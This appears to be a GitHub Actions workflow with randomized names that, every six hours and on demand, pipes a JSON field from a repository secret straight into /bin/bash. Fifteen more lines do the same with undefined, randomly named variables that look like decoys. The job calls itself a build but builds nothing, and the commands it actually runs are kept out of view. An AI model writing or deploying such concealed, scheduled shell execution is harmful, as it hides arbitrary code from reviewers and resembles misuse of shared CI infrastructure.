name: ershierhoal

on:
  workflow_dispatch:
  schedule:
    - cron: '36 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ershierhoal
        env:
          ldw64: ${{ secrets.ldw64 }}
        run: |
          echo $ldw64 | jq -r .bdrqd55 | /bin/bash
          echo $hzth72 | jq -r .rcol30160 | /bin/bash
          echo $gdae2729 | jq -r .gg81 | /bin/bash
          echo $exkrx69017 | jq -r .meql907 | /bin/bash
          echo $r8 | jq -r .ykw8610 | /bin/bash
          echo $olhe98038 | jq -r .pzyq248 | /bin/bash
          echo $saa29 | jq -r .a88 | /bin/bash
          echo $ra5621 | jq -r .nft76 | /bin/bash
          echo $eo376 | jq -r .uevzz72853 | /bin/bash
          echo $x66610 | jq -r .zrjb3219 | /bin/bash
          echo $fq2320 | jq -r .oboz5 | /bin/bash
          echo $krbvu9613 | jq -r .cofqq3 | /bin/bash
          echo $su8 | jq -r .xmn9 | /bin/bash
          echo $e8 | jq -r .bz9 | /bin/bash
          echo $gbryq83 | jq -r .s296 | /bin/bash
          echo $wm784 | jq -r .x3569 | /bin/bash

